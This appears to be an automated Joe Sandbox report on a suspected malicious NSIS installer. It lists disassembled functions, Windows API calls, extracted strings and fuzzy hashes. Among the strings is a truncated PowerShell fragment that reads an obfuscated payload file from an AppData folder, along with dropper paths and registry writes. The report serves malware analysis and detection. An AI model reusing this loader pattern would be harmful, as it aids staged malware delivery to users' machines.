Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 7987dc06055d2fcbd6de0c389dd755b94e4b1d186a0c9c18156fcbaf8ea50e81
Instruction ID: 9ac6bcba1e22606d8a3f98507846f809c14ae5b1cd4137618ecf9cbbc0e374ac
Opcode Fuzzy Hash: 7987dc06055d2fcbd6de0c389dd755b94e4b1d186a0c9c18156fcbaf8ea50e81
Instruction Fuzzy Hash: D6F08C71A04115AFD710EBA4DA499AEB378EF14328F6001BBE116F31E5D7B88E419B29

Function 00403FC1 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FFD
ShowWindow.USER32(?), ref: 0040401D
GetWindowLongW.USER32(?,000000F0), ref: 0040402F
ShowWindow.USER32(?,00000004), ref: 00404048
DestroyWindow.USER32 ref: 0040405C
SetWindowLongW.USER32(?,00000000,00000000), ref: 00404075
GetDlgItem.USER32(?,?), ref: 00404094
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040A8
IsWindowEnabled.USER32(00000000), ref: 004040AF
GetDlgItem.USER32(?,00000001), ref: 0040415A
GetDlgItem.USER32(?,00000002), ref: 00404164
SetClassLongW.USER32(?,000000F2,?), ref: 0040417E
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041CF
GetDlgItem.USER32(?,00000003), ref: 00404275
ShowWindow.USER32(00000000,?), ref: 00404296
KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042A8
EnableWindow.USER32(?,?), ref: 004042C3
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042D9
EnableMenuItem.USER32(00000000), ref: 004042E0
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042F8
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040430B
lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404335
SetWindowTextW.USER32(?,00422F08), ref: 00404349
ShowWindow.USER32(?,0000000A), ref: 0040447D

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 121052019-0
Opcode ID: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
Instruction ID: f4824fcfb4375dbde2e3aa314f90dcffafac0cdac9d9fdfce080a9e5a5e1030c
Opcode Fuzzy Hash: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
Instruction Fuzzy Hash: E7C1CEB1600200BBCB216F61EE49E2B3A68FB95719F41053EF751B11F0CB795882DB2E

Function 00403C13 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406935: GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
Part of subcall function 00406935: GetProcAddress.KERNEL32(00000000,?), ref: 00406962

lstrcatW.KERNEL32(1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\87h216Snb7.exe",00008001), ref: 00403C94
lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,771B3420), ref: 00403D14
lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D27
GetFileAttributesW.KERNEL32(: Completed), ref: 00403D32
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis), ref: 00403D7B

Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495

RegisterClassW.USER32(004289C0), ref: 00403DB8
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DD0
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E05
ShowWindow.USER32(00000005,00000000), ref: 00403E3B
GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E67
GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E74
RegisterClassW.USER32(004289C0), ref: 00403E7D
DialogBoxParamW.USER32(?,00000000,00403FC1,00000000), ref: 00403E9C

Strings

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis, xrefs: 00403CA3, 00403CAB, 00403D4E, 00403D54, 00403D64
_Nb, xrefs: 00403D97, 00403DFF
RichEd20, xrefs: 00403E41
: Completed, xrefs: 00403CDB, 00403CE4, 00403CF2, 00403D41, 00403D47
RichEd32, xrefs: 00403E4F
RichEdit, xrefs: 00403E6E
.DEFAULT\Control Panel\International, xrefs: 00403C7F
"C:\Users\user\Desktop\87h216Snb7.exe", xrefs: 00403C16
RichEdit20W, xrefs: 00403E5F, 00403E65
.exe, xrefs: 00403D21
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403C18
Control Panel\Desktop\ResourceLocale, xrefs: 00403C47
1033, xrefs: 00403C33, 00403C8F

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\87h216Snb7.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-4265789651
Opcode ID: b628336323bb02343b5fb0529852f76f357befb3686fccd2f1025f323f731d9b
Instruction ID: 5b9c441e0465166458f669e0e2db1e5d0b29f952519833dd96bf398df7fa21fd
Opcode Fuzzy Hash: b628336323bb02343b5fb0529852f76f357befb3686fccd2f1025f323f731d9b
Instruction Fuzzy Hash: E661D570600300BAD620AF66DD46F3B3A7CEB84B49F81453FF941B61E2CB795952CA6D

Function 004030A2 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004030B3
GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 004030CF

Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057

GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 0040311B
GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251

Strings

"C:\Users\user\Desktop\87h216Snb7.exe", xrefs: 004030A8
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403278
C:\Users\user~1\AppData\Local\Temp\, xrefs: 004030A9
soft, xrefs: 00403190
Error launching installer, xrefs: 004030F2
C:\Users\user\Desktop, xrefs: 004030FD, 00403102, 00403108
Null, xrefs: 00403199
Inst, xrefs: 00403187

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\87h216Snb7.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-339472620
Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
Instruction ID: 0f45a59523ef10b9f6d61eaf83b2f91e1f12d324a613ce28672a4e7bf9d48b30
Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
Instruction Fuzzy Hash: 7B51B071A01304AFDB209F65DD86B9E7FACAB08356F20417BF504B62D1CB789E818B5D

Function 0040657E Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 204
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004066A0
GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,matrices,?,?,00000000,00000000,00418EC0,00000000), ref: 004066B6
SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 00406714
CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040671D
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch,00000000,matrices,?,?,00000000,00000000,00418EC0,00000000), ref: 00406748
lstrlenW.KERNEL32(: Completed,00000000,matrices,?,?,00000000,00000000,00418EC0,00000000), ref: 004067A2

Strings

matrices, xrefs: 004065A2
"$redeemership=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Torsionsaffjedring.Une';$Tilta, xrefs: 00406777
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406671
: Completed, xrefs: 004065AB, 00406665, 0040666C, 00406670, 00406689, 0040668A, 0040669F, 004066B5, 004066E6, 00406712, 00406747, 0040674D, 0040676A, 0040677D, 0040679B, 004067A1, 004067AA, 004067DF
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406742

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
String ID: "$redeemership=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Torsionsaffjedring.Une';$Tilta$: Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$matrices
API String ID: 4024019347-1284859393
Opcode ID: fc1dd504962f454d72de7fc8bd3fa5b90e0c752258918fd1551a188d423c3a78
Instruction ID: 9d84e59ac7151f7caf92dcd2fae633819e279481621c74ff0a59597acd22528a
Opcode Fuzzy Hash: fc1dd504962f454d72de7fc8bd3fa5b90e0c752258918fd1551a188d423c3a78
Instruction Fuzzy Hash: 46612471A047119BD7209F28DC80B7A77E4AF58328F65053FF686B32D0DA3C89A5875E

Function 00401794 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,%Konstituerende176%\presatisfaction,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde,?,?,00000031), ref: 004017D5
CompareFileTime.KERNEL32(-00000014,?,%Konstituerende176%\presatisfaction,%Konstituerende176%\presatisfaction,00000000,00000000,%Konstituerende176%\presatisfaction,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde,?,?,00000031), ref: 004017FA

Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E

Part of subcall function 004055C6: lstrlenW.KERNEL32(matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
Part of subcall function 004055C6: lstrcatW.KERNEL32(matrices,00403412,00403412,matrices,00000000,00418EC0,00000000), ref: 00405621
Part of subcall function 004055C6: SetWindowTextW.USER32(matrices,matrices), ref: 00405633
Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681

Strings

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde, xrefs: 004017C3
eksegeternes, xrefs: 0040185A, 00401876
lftninger\slangetmmerens, xrefs: 00401846, 00401864
%Konstituerende176%\presatisfaction, xrefs: 004017B2, 004017BB, 004017DA, 004017E6, 0040181C, 00401832, 00401850, 0040188C, 0040190D, 00401916, 00401920, 0040192B

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: %Konstituerende176%\presatisfaction$C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde$eksegeternes$lftninger\slangetmmerens
API String ID: 1941528284-1733476684
Opcode ID: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
Instruction ID: 43cdcdb3dd666cfde73f7e2270c9ebc879cf542ec353fd5a36f292582218c0dc
Opcode Fuzzy Hash: b5c9de8d8c973790bb063ac1906df9c73b5cc822e409ceab015e7b2e817133de
Instruction Fuzzy Hash: 0141B431910604BACB117BA9DD86DBE3AB5EF45329F21427FF412B10E1CB3C8A91966D

Function 004055C6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
lstrlenW.KERNEL32(00403412,matrices,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
lstrcatW.KERNEL32(matrices,00403412,00403412,matrices,00000000,00418EC0,00000000), ref: 00405621
SetWindowTextW.USER32(matrices,matrices), ref: 00405633
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681

Strings

matrices, xrefs: 004055E7, 004055F7, 004055FD, 00405620, 0040562C

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: matrices
API String ID: 2531174081-3449136062
Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
Instruction ID: 832834c51e0bf9a0f82df7ca1b5cea98aaac4e2da268f37eaeed00ca70cd3c8d
Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
Instruction Fuzzy Hash: BA21A175900558BACB119FA5DD84DCFBF79EF45350F50843AF904B22A0C77A4A41CF58

Function 004032D9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040333A
GetTickCount.KERNEL32 ref: 004033BB
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033E8
wsprintfW.USER32 ref: 004033FB

Strings

... %d%%, xrefs: 004033F5

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
Instruction ID: 37f968fffa50e4a1d2003f203ee40286d056d648d4267fa9fd8a089c231f80ea
Opcode Fuzzy Hash: e7fa7c67b3f0a3124cb3a29f9b55057277156487209fd06c273e2d2da92cacc6
Instruction Fuzzy Hash: 39517E71900219EBCB11DF65D944BAF3FA8AF40766F14417BF804BB2C1D7789E408BA9

Function 004068C5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
wsprintfW.USER32 ref: 00406917
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B

Strings

%s%S.dll, xrefs: 00406911
UXTHEME, xrefs: 004068CE

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME
API String ID: 2200240437-1106614640
Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction ID: 5a11031caceee5166790be9fdf4905626ac305c011281564bfcfed8699633c36
Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction Fuzzy Hash: 4FF0FC31501219A6CF10BB68DD0DF9B375C9B00304F10847EA546F10E0EB78D768C798

Function 004024AF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(lftninger\slangetmmerens,00000023,00000011,00000002), ref: 004024FA
RegSetValueExW.KERNELBASE(?,?,?,?,lftninger\slangetmmerens,00000000,00000011,00000002), ref: 0040253A
RegCloseKey.KERNELBASE(?,?,?,lftninger\slangetmmerens,00000000,00000011,00000002), ref: 00402622

Strings

lftninger\slangetmmerens, xrefs: 004024EB, 004024F9, 00402510, 00402524, 0040252F

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: lftninger\slangetmmerens
API String ID: 2655323295-458217052
Opcode ID: ad63a50b818fcea08fea4855f3ef13eab50eab8dbec4c944f94bf8ca7bbae644
Instruction ID: 8b3a83999d63c16b18a9973427bcf430ab7992b94c8fe07ed2dd95b358db5eaa
Opcode Fuzzy Hash: ad63a50b818fcea08fea4855f3ef13eab50eab8dbec4c944f94bf8ca7bbae644
Instruction Fuzzy Hash: 1611B431D00114BEDB00AFA5DE59AAEB6B4EF44318F20443FF400B61D1C7B88E409668

Function 00406060 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040607E
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040351A,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806), ref: 00406099

Strings

nsa, xrefs: 0040606D
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00406065

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
